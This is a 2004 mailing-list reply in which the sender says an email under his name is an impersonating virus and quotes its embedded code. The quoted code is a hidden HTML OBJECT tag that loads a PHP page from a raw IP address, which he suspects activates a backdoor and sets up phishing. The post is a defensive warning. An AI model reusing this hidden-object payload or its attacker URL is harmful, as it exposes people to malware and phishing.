RE: Site changes

Please, no more messages telling me I have a virus. I don't, this is an
impersonation virus. Look at the headers.
 
Embedded in the message is some active code that goes to a web site, it
appears that what it does is to activate a backdoor left by a previous
virus.
 
  <OBJECT style="DISPLAY: none" 
 
data=http://24.171.136.45:81/617598.php></OBJECT></FONT></BLOCKQUOTE></BODY>
</HTML>
 
My current theory is that MyDoom or the like opens up a backdoor, then the
capture messages are sent by the second virus. If you get bit then they
start running a phishing scam on your machine.
 
I have not got complete proof of this yet, but I am working with our
anti-phishing team to see if we can find it.
 
        Phill

-----Original Message-----
From: www-xkms-request@w3.org [mailto:www-xkms-request@w3.org]On Behalf Of
pbaker@verisign.com
Sent: Thursday, March 18, 2004 1:37 AM
To: www-xkms@w3c.org
Subject: Site changes

Received on Thursday, 18 March 2004 09:50:12 UTC